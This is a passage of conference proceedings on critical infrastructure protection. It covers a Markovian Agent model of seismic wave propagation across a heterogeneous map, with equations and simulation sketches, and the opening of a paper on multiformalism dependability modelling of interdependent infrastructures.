3. COMEST (World Commission on the Ethics of Scientific Knowledge and Technology): The Precautionary Principle. UNESCO, Paris (2005)
4. Cranor, C.F.: Toward Understanding Aspects of the Precautionary Principle. Journal of Medicine and Philosophy 29(3), 259–279 (2004)
5. Ezell, B.C.: Infrastructure Vulnerability Assessment Model (I-VAM). Risk Analysis 27(3), 571–583 (2007)
6. Gadomski, A.M.: TOGA: A Methodological and Conceptual Pattern for Modeling of Abstract Intelligent Agent. In: Proc. of the First International Round-Table on Abstract Intelligent Agent, January 25-27, 1993. ENEA print (1994)
7. Gadomski, A.M.: TOGA Systemic Approach to the Global Specification. Sophocles Project Report, EU EUREKA (February 12, 2002), http://hid.casaccia.enea.it/RepSoph-v10.pdf
8. Gadomski, A.M.: Socio-Cognitive Engineering Foundations and Applications: From Humans to Nations. Preprints of SCEF 2003 (First International Workshop on Socio-Cognitive Engineering Foundations and Third Abstract Intelligent Agent International Round-Tables Initiative), Rome, September 30 (2003), http://hid.casaccia.enea.it/Gad-PositionPap-5a.pdf
9. Gadomski, A.M.: Human organisation socio-cognitive vulnerability: the TOGA meta-theory approach to the modelling methodology. International Journal of Critical Infrastructures 5(1-2), 120–155 (2009)
10. Gadomski, A.M., et al.: Towards Intelligent Decision Support Systems for Emergency Managers: The IDA Approach. International Journal of Risk Assessment and Management, IJRAM 2(3/4) (2001)
11. Gadomski, A.M., Zimny, T.A.: Risk and Precautionary Principle in Managerial Decision Making: the TOGA Meta-theory Socio-cognitive Perspective. In: CRITIS 2008 Pre-Proceedings, pp. 374–386 (2008)
12. Hahn, W., Sunstein, C.R.: The Precautionary Principle as a basis for decision making. The Economists' Voice 2(2) (2005)
13. Haimes, Y.Y.: Total Risk Management. Risk Analysis 11(2), 169–171 (1991)
14. Haimes, Y.Y.: The Role of the Society for Risk Analysis in the Emerging Threats to Critical Infrastructures. Risk Analysis 19(2), 153–157 (1999)
15. Haimes, Y.Y.: On the Definition of Vulnerabilities in Measuring Risks to Infrastructures. Risk Analysis 26(2), 293–296 (2006)
16. Jones, A.: Critical infrastructure protection. Computer Fraud & Security 2007(4), 11–15 (2007)
17. Peterson, M.: The Precautionary Principle Is Incoherent. Risk Analysis 26(3), 595–601 (2006)
18. Snediker, D.E., Murray, A.T., Matisziw, T.C.: Decision support for network disruption mitigation. Decision Support Systems 44, 954–969 (2008)
Disaster Propagation in Heterogeneous Media via Markovian Agents

Davide Cerotti1, Marco Gribaudo1, and Andrea Bobbio2

1 Dipartimento di Informatica, Università di Torino, Torino, Italy
{cerotti,marcog}@di.unito.it
2 Dipartimento di Informatica, Università Piemonte Orientale, Alessandria, Italy
[email protected]

Abstract. A Critical Infrastructure Protection (CIP) program requires the capability of forecasting how a potential threat originating in some geographical location propagates in a heterogeneous environment. We propose an approach to disaster propagation analysis based on interacting Markovian Agents. For the sake of illustration, the paper discusses the propagation of a seismic wave and presents an analysis tool where, starting from an arbitrarily chosen geographical map of the region of interest and fixing the epicenter of the seismic phenomenon, the speed and intensity of the wave are computed and directly displayed on the map.
1 Introduction
Disaster scenarios involving critical infrastructures are strongly influenced by the geographical location of the infrastructures with respect to the source originating the threat, the properties of the terrain, and the propagation aptitude of the involved or traversed media. In fact, the propagation speed and direction of fire, blast, flooding, contamination or earthquake are primarily determined by the conditions of the terrain or of the surrounding environment. These conditions are usually highly heterogeneous, making an accurate analysis of the threat propagation heavily dependent on local conditions and, in any case, very difficult. A recent approach [3] is based on the construction of a buffer zone around the source of the threat and on the computation of the propagation speed by means of a simple maximum resistance approximation. We propose a more detailed propagation model that exploits the capabilities of a new spatial entity called Markovian Agent (MA) [1]. In the spirit of the usual agent definition [2], a MA is an entity that can evolve autonomously according to some internal rules, but interacts with the environment and with the other agents. In particular, a MA is a finite-state continuous-time homogeneous Markov chain that evolves according to a given transition rate matrix; moreover, the MA can send and receive messages. The interaction among MAs is thus represented by the exchange of relational entities, called messages, that are emitted by a MA and perceived by the other ones, influencing their dynamics. The specific interaction among agents is formalized through a propagation function that depends on the sending and receiving aptitude of the involved MAs, but also on their geographical location and on the conductivity features of the traversed media.

The general model of interacting MAs has proved to be rather flexible [1], and is suited to cover a variety of different situations in which the global behaviour is determined by the interrelations of smaller entities. In this paper, we show how the use of interacting MAs can be adapted to model the propagation of a threat in a heterogeneous medium. For the sake of illustration, we concentrate on the diffusion of an idealized earthquake wave, in a 2D environment, originating from an epicenter in a given geographical region. The region of interest is partitioned into a grid of small cells with constant geological characteristics. A MA is resident in each cell, and its dynamics and transmittance properties depend on the geological characteristics inside the cell. The propagation of the earthquake wave is modelled through the diffusion of messages of different intensity, originated by the MA located at the earthquake epicenter and propagated radially along the MAs in adjacent cells. In this way, the property of the terrain and its influence on the speed and intensity of the wave propagation can be tuned very finely, cell by cell, and derived from the geological map of the region under consideration.

This work has been partially supported by grant MIUR-PRIN 2007J4SKYP.
2 Interacting Markovian Agents
Let V denote the (two-dimensional) geographical region within which we confine the study of the effects of the seismic wave. Once the map of the selected region is loaded, the earthquake epicenter can be located at any position inside the map. Then, starting from this epicenter, the region V is partitioned into a set of exhaustive and mutually exclusive cells, small enough to make reasonable the assumption that the geological and transmittance characteristics of the terrain in each cell are constant. An example of the partition of the Province of Alessandria in Italy is given in Figure 1(a), with a mean cell length of about 1 km. Each cell of the partition is identified by the vector v of the polar coordinates of its central position. The system of polar coordinates has its origin at the epicenter of the earthquake (see Figure 1a), and we assume, in the present paper, that the propagation of the wave is only in the radial direction. The heterogeneity of the terrain and of its geological properties can be defined at the cell level, and derived from the map colors and texture. A single MA is positioned in each cell. A MA is an extension of a continuous-time Markov chain that adds the possibility of generating and receiving messages of different classes. Thus a MA is characterized by its infinitesimal generator, by the probability of sending messages of a given class and by the probability of accepting an arriving message of a given class. Moreover, a propagation function governs the propagation of the messages through the grid of cells. Since the medium is heterogeneous, the parameters of the MA depend on the position v of the cell in which the MA is resident. Furthermore, let us assume
Fig. 1. a) Map of the selected region (the Alessandria province); b) The Markovian agent used in the wave propagation
that there are MC classes of messages. More formally, a Markovian Agent MA is a tuple:

MA(v) = {Q(v), P(v, m), R(v, m)}   (1)

where:
Q(v) = |q_ij(v)| is the n × n infinitesimal generator matrix of the continuous-time Markov chain of the agent located at v, whose entries q_ij(v) represent the transition rates from state i to state j.
P(v, m) = |p_ij(v, m)| is a set of MC matrices of dimension n × n. Each entry p_ij(v, m) represents the probability that a message of class m (m = 1, 2, . . . , MC) is generated in a MA located at v when a transition from state i to j occurs. We have that:

Σ_{m=1}^{MC} p_ij(v, m) ≤ 1,   ∀ 1 ≤ i, j ≤ n.   (2)
From the above definitions, we can compute the rate β_i(v, m) at which messages of class m are produced in state i at location v:

β_i(v, m) = Σ_{j≠i} q_ij(v) p_ij(v, m)   (3)
R(v, m) = |r_ij(v, m)| is a set of MC matrices of dimension n × n that describe the probability of accepting a message of class m. In particular, a MA in state i at position v has a probability r_ii(v, m) of ignoring an arriving message of class m and a probability 1 − r_ii(v, m) of accepting it. An accepted message m induces an immediate state change toward state j with probability r_ij(v, m). We have that:

Σ_{j=1}^{n} r_ij(v, m) = 1,   ∀ 1 ≤ i ≤ n, ∀m.   (4)
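With Q, P and R defined, the agent tuple of Equation (1) maps onto a small data structure; the sketch below (our own illustrative Python, not the authors' tool) also computes the production rates of Equation (3) and is reused by the solver fragment shown after Equation (7).

```python
# Illustrative container for a Markovian Agent MA(v) (Equations 1-4).
import numpy as np
from dataclasses import dataclass

@dataclass
class MarkovianAgent:
    Q: np.ndarray   # (n, n) infinitesimal generator
    P: np.ndarray   # (MC, n, n) message-generation probabilities
    R: np.ndarray   # (MC, n, n) message-acceptance probabilities

    def beta(self) -> np.ndarray:
        """Production rates of Equation (3), as an (MC, n) array."""
        off = self.Q - np.diag(np.diag(self.Q))   # q_ij for j != i
        return np.einsum('ij,mij->mi', off, self.P)
```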
The message exchange is governed by the propagation function u(v, i, v', i', m), which defines how a message of class m generated in state i' of a MA located at v' arrives in state i of a MA located at v. Since a MA can change state when it accepts a message, the local dynamics of the agent is not only determined by the matrix Q(v) but also by the rate at which received messages are accepted. We denote by γ_i(τ, v, m) the rate at which messages of class m are perceived by a MA in state i at location v, at time τ. The rate γ_i(τ, v, m) depends on the rate at which messages are generated (Equation 3) and on how they are propagated in the traversed medium:

γ_i(τ, v, m) = Σ_{i'=1}^{n} ∫_V π_i'(τ, v') u(v, i, v', i', m) β_i'(v', m) dv'   (5)
where π_i'(τ, v') is the probability of finding a MA in state i' at location v', at time τ. Messages arriving at state i cause a state change to state j according to the acceptance probability of Equation (4). Hence the global transition rate from i to j can be computed as:

c_ij(τ, v) = q_ij(v) + Σ_{m=1}^{MC} γ_i(τ, v, m) r_ij(v, m)   (6)
Defining from Equation (6) a matrix C(τ, v) = |c_ij(τ, v)|, the state probability vector of each MA can be obtained by solving the standard Chapman–Kolmogorov equation:

dπ(τ, v)/dτ = π(τ, v) C(τ, v)   (7)

Equation (7) is solved by an iterative numerical procedure starting from a known initial condition π(0, v).
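A first-order (Euler) integration of Equation (7) over the finite grid of cells, of the kind the authors mention using in Section 4, can then be sketched as follows (continuing the MarkovianAgent illustration above; the propagation function u is passed in as a plain callable):

```python
# Illustrative Euler solver for Equation (7) over the grid of agents.

def euler_step(agents, pi, u, dt):
    """agents: dict cell -> MarkovianAgent; pi: dict cell -> state vector;
    u(v, i, v2, i2, m): propagation function. Returns pi after one step dt."""
    new_pi = {}
    for v, a in agents.items():
        MC, n = a.P.shape[0], a.Q.shape[0]
        gamma = np.zeros((MC, n))
        # Equation (5): the integral over V becomes a sum over the grid.
        for v2, a2 in agents.items():
            beta2 = a2.beta()
            for m in range(MC):
                for i in range(n):
                    gamma[m, i] += sum(pi[v2][i2] * u(v, i, v2, i2, m)
                                       * beta2[m, i2] for i2 in range(n))
        # Equation (6): local generator plus accepted-message rates.
        C = a.Q.copy()
        for m in range(MC):
            C += np.diag(gamma[m]) @ a.R[m]
        np.fill_diagonal(C, 0.0)
        np.fill_diagonal(C, -C.sum(axis=1))   # keep C a proper generator
        new_pi[v] = pi[v] + dt * (pi[v] @ C)  # Equation (7), forward Euler
    return new_pi
```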
3 Markovian Agents for Earthquake Propagation
The MA that we propose for the analysis of the propagation of a two-dimensional, simplified seismic wave is shown in Figure 1(b). We assume that the intensity of the wave can be discretized into three levels of increasing severity: low (L), medium (M) and high (H). Correspondingly, there are three classes of messages, mL, mM and mH, where the suffix denotes the intensity of the wave. The MA has four states: the quiet (non-excited) state is labeled 0, while the states L, M and H represent the MA in an excited state of low, medium and high intensity, respectively. We assume that a MA can accept messages only when in state 0; hence only the entries r_0I(v, m) (I = L, M, H) in Equation (4) are different from 0.
When the MA at location v is in its 0 state and accepts a message mI of class I (I = L, M, H), it jumps to the corresponding excited state I. The rates c_0I(τ, v) (dashed lines in Figure 1b) are only due to the contribution of the accepted messages (Equation 6):

c_0I(τ, v) = Σ_{m=1}^{MC} γ_0(τ, v, m) r_0I(v, m)
When a MA is in an excited state I, it decays to its quiet state 0 by emitting a mixture of messages of intensity equal to or lower than I. The decay rates c_I0(τ, v) = q_I0(v) (solid lines in Figure 1b) are only due to the contribution of the local infinitesimal generator. The propagation function u(v, i, v', i', m) is defined in such a way that a message emitted in cell v' can reach only the adjacent cells in the radial direction, with an intensity given by a transmittance coefficient α times the distance between the two adjacent cells. Thus the messages propagate by traversing one cell at a time in the radial direction. In each cell v, we define the following parameters that take into account the heterogeneity of the propagation medium:
1. q_I0(v) = μ (for I = L, M, H). Once a MA is excited, the parameter 1/μ gives the mean time to return to state 0 by sending messages of intensity distributed according to a probability distribution determined by the parameter σ. Hence, μ tunes the speed at which an excited MA decays emitting the wave messages.
2. σ. This parameter affects the probability mixture of the emitted messages. A MA in the excited state I can emit messages of intensity I' equal to or lower than I (see Figure 1b), according to a binomial distribution of parameter σ.
3. α. This parameter is proportional to the transmittance of the medium and enters into the propagation function u(v, i, v', i', m). If starting from v' there is only one radially adjacent cell v in the grid, at a distance d_vv', then u(v, i, v', i', m) = α d_vv' (and 0 elsewhere). If starting from v' there are n radially adjacent cells in the grid, then u(v, i, v', i', m) = α/n d_vv' (and 0 elsewhere).

To start the seismic wave, we can choose a cell located at any position v' of the grid of Figure 1 as epicenter, and assume that at τ = 0 the corresponding MA is in some excited state, i.e.:

π_0(0, v') = 0,   π_I(0, v') = a_I ≥ 0,   Σ_{I=L,M,H} a_I = 1
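Instantiating the four-state agent of Figure 1(b) for a cell then amounts to filling the three matrices; the sketch below continues our illustration, and the binomial mixing driven by σ is our own reading of the text (an assumption, not the authors' code):

```python
# Illustrative construction of the 4-state earthquake MA of Figure 1(b).
# States: 0 = quiet, 1 = L, 2 = M, 3 = H; message classes 0..2 = mL, mM, mH.
from scipy.stats import binom

def earthquake_agent(mu, sigma):
    n, MC = 4, 3
    Q = np.zeros((n, n))
    for I in (1, 2, 3):                 # excited states decay at rate mu
        Q[I, 0], Q[I, I] = mu, -mu
    P = np.zeros((MC, n, n))
    for I in (1, 2, 3):                 # on decay, emit intensity <= I
        for m in range(I):              # assumed binomial mixture in sigma
            P[m, I, 0] = binom.pmf(m, I - 1, sigma)
    R = np.zeros((MC, n, n))
    for m in range(MC):
        np.fill_diagonal(R[m], 1.0)     # excited states ignore messages
        R[m][0, 0], R[m][0, m + 1] = 0.0, 1.0  # state 0 jumps to level m+1
    return MarkovianAgent(Q, P, R)
```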
4 Results
We have evaluated the dynamics of the seismic wave propagation over the grid of cells, solving the differential equations using a first-order method. The region
Fig. 2. Spatial wave intensity at two time instants ((a) t = 0 s; (b) t = 5 s) as a function of α
V of the map is partitioned into about 1200 cells with a radial dimension of about 1 km (the dimension of the cell is an optional parameter to be set by the user). For all the numerical computations, the time discretization step is assumed to be Δt = 0.01 s (but Δt, too, is an optional parameter to be set by the user). Since the input map is colored according to the geological properties of the terrain, the input parameters μ, σ and α assigned to each cell are extracted from the intensity of the colors of the cell. To illustrate the potentialities and the possible results of the proposed methodology, we have performed several experiments.

Dependence on α. The objective of the first experiment is to show how our model can capture the effect of the heterogeneities in the terrain transmittance (parameter α) on the intensity of the wave propagation. To this aim, we assume (arbitrarily) that α changes in the region according to the color map represented in the bottom part of Figure 2. Darker zones correspond to higher values of the parameter, lighter zones to lower values. The region is traversed by a river (the Po river) that is colored in white, corresponding to α = 0. Based on the previous discussion, a low value of α prevents the propagation of messages, meaning that the wave does not cross the river (in effect, longitudinal seismic waves are stopped by water). The numerical results are obtained from an initial situation where the MA located at the epicenter is excited with a low-intensity message only; therefore only messages of type L are propagated. Figure 2 gives a histogram of the wave intensity at two different time instants (t = 0; t = 5 s). The intensity is measured as the probability of the MA located in each cell being in the excited state L. As we could expect, the wave presents an asymmetric propagation front due to the varying terrain features, and the wave intensity is higher in the directions and zones in which the values of the parameter α are higher.

Dependence on μ. The second experiment was designed to demonstrate how our model can capture the variations in the propagation speed represented by the parameter μ. To show this effect, we have defined three areas with different average values of μ (the average values of μ in the three zones are μ ≈ 4.5, 4.0, 3.0 s^-1), as shown in the left-hand side of Figure 3. The value 1/μ
Fig. 3. Probability of being in the excited state L versus time for the selected points
represents the mean decay time of a MA in an excited state, and thus the mean time that the wave takes to cover the distance between two adjacent cells. To show the anisotropy of the propagation, we have selected three points on the map, labeled a, b, c, located in the three zones with different average μ and at the same distance of 10 km from the epicenter. We have computed the probability that the MAs located at the selected points are in the excited state, and the results are compared in the right side of Figure 3. The time to reach a cell is lower when the wave traverses a zone with high μ. Points a and b belong to the darker zones for μ, therefore they are reached earlier by the seismic wave; however, since the path leading to point b experiences lower values of the transmittance α, the peak intensity is much lower than the one for the cell at point a. Point c lies in the zone where the parameter μ is lower, and thus it is the last to be reached. Note, however, that the speed of the wave and its intensity can be tuned independently by acting on the values of α and μ.

Dependence on σ. The aim of the third experiment was to show the influence of the parameter σ (0 ≤ σ ≤ 1), whose value determines the mixture of the message intensities among the three levels I = L, M, H. A value of σ close to 1 favors the emission of messages of the highest intensity, while a value close to 0 shifts the intensity toward lower values. As in the previous experiment, we have defined three areas for σ with different color intensities, as shown in the top-left corner of Figure 4. To start the earthquake we have set, as initial condition, that the MA at the epicenter is in state H with probability 1. Hence, initially only a message of intensity H is emitted, which is degraded in passing from cell to cell depending on the value of σ. The results are shown in Figure 4 for the same three points a, b, c considered in the previous experiment. The figures display the probabilities of the excited states L, M and H for the MAs located at the selected points. Point b is in the zone with higher σ than points a and c; therefore the probability of excitation at all levels of intensity is the greatest at point b, followed by points c and a, as shown in Figure 4.
Fig. 4. Probability of points a, b, c of being in the excited states I = L, M, H versus time
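To make the computation concrete, the following Python sketch is our own simplified reading of the model described above, not the authors' solver. It collapses the three excitation levels L, M, H into a single excited-state probability and uses nearest-neighbour coupling, but it shows how per-cell values of the decay rate μ and the transmittance α shape the propagation front (a column with α = 0 plays the role of the river).

```python
# Minimal sketch (not the authors' solver): discrete-time update of the
# probability that the agent in each cell is excited, on a 2-D grid with
# per-cell decay rate mu and transmittance alpha. Simplifying assumption:
# a single excitation level instead of the three levels L, M, H.
import numpy as np

def step(p, mu, alpha, dt=0.01):
    """One time step: excited agents decay at rate mu and excite their
    four neighbours in proportion to the local transmittance alpha."""
    # incoming excitation from the four nearest neighbours
    incoming = np.zeros_like(p)
    incoming[1:, :] += p[:-1, :]
    incoming[:-1, :] += p[1:, :]
    incoming[:, 1:] += p[:, :-1]
    incoming[:, :-1] += p[:, 1:]
    # decay of the excited state plus excitation received through alpha
    p_new = p + dt * (-mu * p + alpha * (1.0 - p) * incoming)
    return np.clip(p_new, 0.0, 1.0)

# toy run: 100 x 100 map, epicenter in the middle, a "river" of alpha = 0
mu = np.full((100, 100), 4.0)        # decay rate [1/s]
alpha = np.full((100, 100), 0.5)     # transmittance
alpha[:, 60] = 0.0                   # the wave cannot cross this column
p = np.zeros((100, 100))
p[50, 30] = 1.0                      # excited agent at the epicenter
for _ in range(500):                 # 5 s with dt = 0.01 s
    p = step(p, mu, alpha)
```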
5
Discussion and Conclusions
We have shown that a system of interacting Markovian Agents can be adapted to analyze the propagation of a critical phenomenon in a heterogeneous environment; the present study is intended to exemplify the power and flexibility of the MA-based technique. We have presented a fine-grained earthquake propagation model that can be exercised directly on a real geographical region whose map can be downloaded in a standard graphical format. The geological features of the terrain in the chosen region are defined by three parameters that can be tuned independently, giving the proposed model high flexibility. The parameter 1/μ gives the average traversal time between two adjacent cells; the transmittance parameter α reduces the signal intensity as a function of the distance; and, finally, the parameter σ mixes the three levels of the signal intensities at each emission. The overall computational cost of the analysis is affordable on a laptop PC.
A Study on Multiformalism Modeling of Critical Infrastructures

Francesco Flammini1,2, Valeria Vittorini2, Nicola Mazzocca2, and Concetta Pragliola1

1 ANSALDO STS - Ansaldo Segnalamento Ferroviario S.p.A., Via Nuova delle Brecce 260, Naples, Italy
{francesco.flammini,concetta.pragliola}@ansaldo-sts.com
2 Università di Napoli "Federico II", Dipartimento di Informatica e Sistemistica, Via Claudio 21, Naples, Italy
{frflammi,valeria.vittorini,nicola.mazzocca}@unina.it
Abstract. This paper explores the possibility of using multiformalism techniques for critical infrastructure modeling and proposes a general scheme for intra- and inter-infrastructure models. Multiformalism approaches allow modelers to adapt the choice of formal languages to the nature, complexity and abstraction layer of the subsystems to be modeled. Another advantage is the possibility of reusing existing (and validated) dependability models and solvers. Complexity and heterogeneity are managed through modularity, and composition allows for representing structural or functional dependencies. Keywords: Critical Infrastructure, Dependability, Security, Performability, Multiformalism Modeling.
1
Introduction
Several frameworks have been proposed in the research literature to cope with critical infrastructure modeling issues, and almost all rely on simulation techniques. Simulation allows one to evaluate the effect of a fault on the infrastructure itself (in terms of produced failures and reduction of operating capacity) and on the other dependent infrastructures. This kind of qualitative analysis is known as a "what if" study: it is able to demonstrate the possibility that a certain undesired event can happen, but not that a certain undesired event can never happen. Generally speaking, simulation does not allow one to:
– analytically evaluate quantitative dependability attributes (such as Mean Time Between Hazardous Events, Vulnerability, Mean Down Time, etc.);
– verify properties on the model, like safety-related ones (e.g. the possibility of reaching an unsafe state, the possibility that two specified infrastructures are unavailable at the same time, etc.).
In order to overcome such limitations, formal methods are widely used in the community of dependability experts to evaluate the attributes of interest. However, as a system grows in complexity and heterogeneity, a single modeling language almost always proves inadequate. In order to balance expressive power, ease of use and efficiency, multiformalism techniques have been proposed. Multiformalism allows modelers to adapt the modeling formalism to the nature and level of abstraction of the subsystem to be modeled, and provides the modeler with a single cohesive view of the entire system. Modularity and compositionality ease modeling and also allow for the reuse of components. This paper explores the possibility of using multiformalism approaches for critical infrastructure modeling, which represents the first stage (analysis) in the critical infrastructure protection life-cycle. The objective is achieved by transferring the methods and exploiting the results already available for the modeling of other classes of critical systems. A brief survey of formal techniques and multiformalism frameworks is presented, highlighting the advantages and limitations of each of them. A general scheme for compositional modeling of critical infrastructures is proposed, which constitutes the main contribution of this paper with respect to the state of the art. Furthermore, a basic combination of modeling formalisms is discussed and some hints are provided on how to cope with solving-efficiency issues.
2
State of the Art
An extensive survey of current projects on CI modeling is provided in [10]. Among these works, some are general and mostly oriented to network topology analysis (graph theory) and agent-based simulation, while others are tailored to specific infrastructures, mostly electricity distribution networks. A survey of model-based dependability and security evaluation techniques is presented in [9]. The word "performability" [8] expresses the composite attribute of a system representing its capacity to operate in degraded conditions in the presence of one or more failures. The concept also applies to critical infrastructures, where the word "performance" can be replaced by "operating capacity". Several graphical formalisms can be adopted to model at least some aspects of critical infrastructures, most of which are widespread in the analysis of computer systems: Queuing Networks (QN), Fault Trees (FT), Reliability Block Diagrams (RBD), Continuous Time Markov Chains (CTMC), Stochastic Petri Nets (SPN), Stochastic Activity Networks (SAN), Timed Automata (TA), Process Algebras (PA), and Bayesian Networks (BN). Furthermore, many extensions of classical formalisms have been proposed in order to overcome their limitations in expressive power or solving efficiency (see e.g. [4]). The advantages and limitations of each modeling language highlight the importance of trade-offs between simplicity (ease of use, readability, maintainability), expressive power and solving efficiency. Multiformalism modeling makes it possible to fine-tune the choice of modeling language to the problem to be solved, using a modular and compositional approach. This also seems to fit well with the concept of Hierarchical Holographic Modeling (HHM) proposed
in [3]. Sanders [11] has provided a survey of multiformalism, multilevel modeling frameworks, including SHARPE, AToM3, DEDS, SMART and Möbius. These frameworks differ in several features, including the basic multiformalism strategy (e.g. the use of a high-level abstract formalism into which all submodels are translated), the possibility of model connection (result exchange) or composition (state/event sharing), the support for meta-modeling and multi-paradigm modeling, etc. OsMoSys is a new multiformalism framework supporting multisolution, meta-modeling and object-oriented paradigms (including formalism inheritance and model polymorphism). Its open software architecture allows for the reuse of both formalisms and models and the integration of any existing solvers/applications (including other multiformalism tools), which are wrapped by adapters and managed by a specific workflow engine [2]. OsMoSys supports both implicit and explicit multiformalism and has been adopted to model complex systems reliability [5]. An important issue in multiformalism modeling is the interaction among components [6], which requires introducing proper connection/composition operators. Such operators are needed in HHM to account for intra-/inter-infrastructure and intra-/inter-layer model interaction. Another issue is the management of complexity, which is addressed by several means, including symmetrical modeling, model equivalence, divide-et-impera approaches based on hierarchical decomposition, etc. State-based formalisms are amenable to model checking with the aim of verifying desired properties. One way to model-check multiformalism models is to translate all submodels (including non-state-based ones) into a single high-level formalism [1]. The problem of complexity management in model checking is still open, though some techniques based on abstraction (symbolic model checking) and backward analysis have been proposed. All the aforementioned issues are relevant to the multiformalism modeling of CI and therefore need to be addressed. However, the application of formal verification techniques is theoretically possible even on agent-based systems [7].
3
Multiformalism Modeling of Critical Infrastructures
CI modeling requires taking into account internal infrastructure dynamics (intra-infrastructure models) and the interaction among different infrastructures (inter-infrastructure models). First, let us consider a single infrastructure. The following aspects need to be addressed:
1. The failure modes of the infrastructure, in terms of: (a) effects of the occurred damages on assets, environment and people; (b) outage time and required maintenance; (c) reduction in the operational capacity.
2. The dynamics of internally originated faults (the fault-error-failure chain), both natural and human-made malicious, and of the related recovery procedures.
3. The propagation to other infrastructures of: (a) failures having external effects; (b) reductions of operational capacity.
4. The dynamics of externally originated faults, that is, of those induced by other infrastructures, which can be: (a) failures received from the other infrastructures; (b) reductions of the operational capacity (caused by a corresponding reduction in the other infrastructures).
For a class of critical systems, the data required for point (1) is provided by qualitative analyses performed on the single infrastructure, including Hazard Analysis, Failure Mode and Effect Analysis (FMEA) and, for external malicious faults, Security Risk Analysis. For these systems, failure models are usually needed for the demonstration of RAMS (Reliability, Availability, Maintainability, Safety) properties; however, such models only account for random faults. In a growing number of cases, security-related vulnerability models are also available, when a Quantitative Risk Assessment (QRA) has been performed on the infrastructure. Whenever available, these models should provide the necessary inputs for point (2). Points (3) and (4) relate to the interaction among the network of infrastructures, in order to model the propagation of faults and the effect of a reduction of the operational capacity of one infrastructure on the other interacting infrastructures. Interaction models must be developed in order to represent such interdependencies. A general scheme for modular and compositional modeling of a single infrastructure K in a context of N infrastructures is proposed in Fig. 1; the scheme is independent of the modeling languages used to represent submodels. The scheme is a block diagram composed of a set of (typically heterogeneous) models, featuring three main vertical layers:
– a failure modeling layer (including Kf submodels);
– a recovery modeling layer (including Kr submodels);
– an operational capacity modeling layer (including Kc submodels);
and three horizontal layers:
– an internal failure/recovery/capacity layer;
– two interface layers, that is:
• the input (i.e. received) failures/capacity layer;
• the output (i.e. propagated) failures/capacity layer.
For instance, R.F. submodel J.K represents the effects on infrastructure K of failures originated by infrastructure J. Macro-blocks of the reference scheme could be divided into more layers in order to ease modeling by using divide-et-impera approaches (e.g. separation of concerns between hardware and software layers). Additional layering can also account for organizational, social or other non-technical aspects. The internal models refer to points (1) and (2) above. In particular, the internal recovery model specializes in representing the restore process and the degraded operating modes that are a consequence of failure, emergency or crisis situations. The internal capacity layer models the effects of failures on the operating capacity of the same infrastructure.
The input/output interface models account for the interaction with other infrastructures, as reported in points (3b) and (4b). The interaction between the models must be provided by composition operators, which can be simple connectors in their basic form. Such operators can be of the following types:
– intra-infrastructure, that is, connecting submodels of the same infrastructure, which can be further divided into:
• intra-layer, that is, connecting models belonging to the same layer;
• inter-layer, that is, connecting models of different layers;
– inter-infrastructure, that is, connecting models belonging to different infrastructures.
The last class of operators is used to model infrastructure interdependencies and is therefore linked to the aforementioned interface models. A structural sketch in code is given after Fig. 1.
[Figure 1 block diagram: the model of critical infrastructure K, with internal capacity, recovery and failure models (capacity submodels K1..Kc, recovery submodels K1..Kr, failure submodels K1..Kf), input interface models (R.C. and R.F. submodels 1.K..(N-1).K) and output interface models (P.C. and P.F. submodels 1.K..(N-1).K). N: total number of interacting infrastructures; R.C.: Received Capacity; R.F.: Received Failures; P.C.: Provided Capacity; P.F.: Provided Failures.]
Fig. 1. A modular scheme for intra-infrastructure models
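To make the scheme of Fig. 1 concrete, here is a minimal structural sketch in Python. It is our own illustration, not part of the paper's framework: the class and submodel names are hypothetical, and only the classification of connector operators follows the definitions given above.

```python
# Minimal structural sketch (hypothetical names): infrastructure K as failure,
# recovery and capacity submodels plus interface submodels, wired together by
# connector operators classified as intra-layer, inter-layer or
# inter-infrastructure.
from dataclasses import dataclass, field

@dataclass
class Submodel:
    name: str
    layer: str                 # "failure", "recovery" or "capacity"

@dataclass
class Connector:
    source: Submodel
    target: Submodel
    kind: str                  # operator type, derived below

@dataclass
class InfrastructureModel:
    name: str
    submodels: list = field(default_factory=list)
    connectors: list = field(default_factory=list)

    def connect(self, src, dst, other_infrastructure=False):
        # classify the operator from the layers of the connected submodels
        if other_infrastructure:
            kind = "inter-infrastructure"
        elif src.layer == dst.layer:
            kind = "intra-layer"
        else:
            kind = "inter-layer"
        self.connectors.append(Connector(src, dst, kind))

k = InfrastructureModel("K")
fail = Submodel("internal failure model", "failure")
rec = Submodel("internal recovery model", "recovery")
cap = Submodel("internal capacity model", "capacity")
rf_in = Submodel("R.F. submodel J.K", "failure")   # failures received from J
k.submodels += [fail, rec, cap, rf_in]
k.connect(rf_in, fail)     # intra-layer (interface to internal failure model)
k.connect(fail, rec)       # inter-layer (upward: failures trigger recovery)
k.connect(cap, fail)       # inter-layer (downward: overstress causes failures)
```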
In the reference scheme of Fig. 1, it should be noticed that while the data flowing through the horizontal layers is unidirectional (left to right), since it follows a precise input-output relation, the data exchanged among the vertical layers is bidirectional. In fact, the capacity, failure and recovery macro-blocks influence one another. For instance, when the infrastructure is overstressed (e.g. due to the unavailability of other infrastructures), a failure can be originated, hence the downward connection. Similarly, a non-malicious fault in performing corrective maintenance interventions or executing recovery procedures could itself originate a failure.
[Figure 2: infrastructures CI 1 … CI (N-1) connected to infrastructure CI K through composition operators OP 1.K … OP (N-1).K.]
Fig. 2. Inter-infrastructure model composition
Another aspect which needs to be highlighted is that the input/output interface layers are not separated into vertical layers. This allows for any interaction with the internal models; e.g., a limited capacity of some external infrastructures could influence the internal capacity as well as the possibility of performing recovery interventions (imagine the scenario of a blocked highway preventing repair teams from reaching remote sites of a failed railway infrastructure). In the general scheme, models can be substituted by simplified versions (e.g. "stubs") in a first approximation, thus following a step-wise refinement strategy (possibly result-driven) starting from basic (i.e. more abstract) models. Fig. 2 reports the basic interconnection scheme for the integration of intra-infrastructure models in order to perform interdependency analyses. Since such a view is at a higher hierarchical level, CIs are simply represented by blocks, which results in an easy-to-read representation. The interconnection is performed by means of composition operators (OP), which can allow for bidirectional flows (input/output). For submodels which are not already available, the choice of the modeling formalism is an important issue. Some of the most widespread modeling formalisms were surveyed in Section 2. In the same section we also pointed out that the integration of the failure and performance models of the same system into a single cohesive model is known as performability. Many performability models are based on various forms of Stochastic Petri Nets (e.g. GSPN). A basic example is reported in Fig. 3a: the upper part models a queue, while the bottom part represents a two-state CTMC. The model assumes a single internal failure mode and a single service provided. In the case of more failure modes, the CTMC must include more states, while more queues should be modeled when more services are provided. In multiformalism approaches, performance and dependability models are kept separated. Fig. 3b reports an example multiformalism performability model of a critical infrastructure considering:
– Queuing Networks for the Internal Capacity Model;
